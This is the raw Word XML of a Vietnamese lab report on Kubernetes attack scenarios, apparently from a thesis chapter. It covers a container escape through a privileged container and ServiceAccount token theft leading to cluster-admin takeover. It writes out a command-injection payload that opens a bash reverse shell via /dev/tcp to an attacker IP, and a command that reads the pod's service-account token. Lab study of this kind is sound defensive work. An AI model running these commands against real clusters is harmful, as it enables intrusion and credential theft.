      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tế</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trọng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phát</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>triển</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giải</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pháp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phòng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thủ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toàn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diện</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chương</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tiếp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>theo.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EF7CCB2" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc233498102"/>
      <w:r w:rsidRPr="00FB4013">
        <w:lastRenderedPageBreak/>
        <w:t>Thiết lập Môi trường Thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="3374B4C9" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AC0F5A2" wp14:editId="279BEEF7">
            <wp:extent cx="1972101" cy="2606821"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
            <wp:docPr id="119987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88731" cy="2628803"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F48610F" w14:textId="7524F909" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc233498142"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mô</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hình</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36C02E5A" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00DC5DB2" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC5DB2">
        <w:t>Môi trường phòng thí nghiệm gồm cụm Kubernetes (Ubuntu 22.04, containerd v1.7) triển khai ứng dụng Microservices giả lập thương mại điện tử với lỗ hổng Command Injection cố ý. Máy tấn công sử dụng hệ điều hành Kali Linux cùng dải mạng nội bộ, được trang bị đầy đủ các công cụ kiểm thử như Nmap, Burp Suite và Kubectl .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BF0B7D" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="242B4C87" wp14:editId="2C23A5DE">
            <wp:extent cx="5218368" cy="1821976"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="1401826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26953" cy="1824973"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D287741" w14:textId="3DD22F23" w:rsidR="00671F8E" w:rsidRPr="00C32400" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc233498143"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:t>. Sơ đồ luồng thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="6473BEF8" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc233498103"/>
      <w:r w:rsidRPr="00FB4013">
        <w:lastRenderedPageBreak/>
        <w:t>Kịch bản TN-01: Tấn công thoát chuồng (Container Escape) qua cấu hình sai Đặc quyền</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="47721F70" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="009E0111" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc233498104"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="002CE262" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="009823E1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="009823E1">
        <w:t>Từ quyền truy cập ban đầu thu được bên trong container Frontend, kẻ tấn công bẻ gãy ranh giới cô lập để nhảy ra ngoài (Escape), chiếm quyền điều khiển đặc quyền root trực tiếp trên hệ điều hành của máy chủ host vật lý (worker01).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F58325" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc233498105"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Điều kiện kích hoạt lỗi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="69B50F76" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00E706D1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="00DC5DB2">
        <w:t>Quản trị viên cấu hình sai lầm nghiêm trọng trong file deployment khi kích hoạt chế độ siêu đặc quyền (privileged: true) cho container</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F151B" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc233498106"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="5D799495" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Thông qua giao diện Web mục tiêu tại cổng 30080, kẻ tấn công tiêm chuỗi payload độc hại vào ô URL:Plaintexthttps://google.com'; bash -c 'bash -i &gt;&amp; /dev/tcp/10.15.xx.173/4444 0&gt;&amp;1'; '. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>Trong đó 10.15.xx.173 là địa chỉ của máy hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4607ED" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="00671F8E">
        <w:t xml:space="preserve">Hệ thống backend thực thi ngầm qua hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os.popen()</w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">
        <w:t xml:space="preserve">, trả về một phiên shell tương tác </w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root@web-frontend-xxx:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">
        <w:t xml:space="preserve"> về cho máy Kali.Kiểm tra năng lực đặc quyền (Capabilities Check): Tại shell vừa chiếm được, kẻ tấn công kiểm tra quyền bằng lệnh: capsh --print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AAC2E0" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quả</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hiển</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thị</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quyền</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cap_sys_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cap_sys_rawio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rightarrow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4302D28F" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc233498107"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="5E5480DA" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FA4830" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="0043452B">
        <w:t>Ngay sau khi lệnh chroot thực thi, không gian gốc của container bị phá vỡ hoàn toàn. Để chứng minh hành vi thoát chuồng chiếm quyền máy chủ vật lý thành công</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE02148" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4013">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="46" w:name="_Toc233498108"/>
      <w:r w:rsidRPr="00FB4013">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
        <w:t>Kịch bản TN-02: Đánh cắp Service Account Token để chiếm quyền cụm Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="3369AB30" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc233498109"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="77D916CB" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="009823E1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="009823E1">
        <w:t>Lợi dụng Token định danh (ServiceAccount) được gắn mặc định trong Pod Frontend để chiếm quyền quản trị tối cao (Cluster Admin) của toàn bộ cụm máy chủ K3s từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4C5917" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc233498110"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Điều kiện kích hoạt lỗi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="32029E33" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00E706D1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="009823E1">
        <w:t>Quản trị viên liên kết tài khoản dịch vụ của Pod Frontend với quyền Admin của toàn cụm thông qua một ClusterRoleBinding quá lỏng</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BD203" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc233498111"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="0E347B82" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="009823E1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">    Khai thác và Đánh cắp Token mật: Kẻ tấn công sử dụng phiên shell chiếm được từ lỗi Command Injection ở TN-01, truy cập vào đường dẫn lưu trữ token nội bộ của Kubernetes để trích xuất khóa cấu hình:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00671F8E" w14:paraId="69735FC2" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0E72E978" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00C32400" w:rsidRDefault="00671F8E" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C32400">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>cat /var/run/secrets/kubernetes.io/serviceaccount/token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
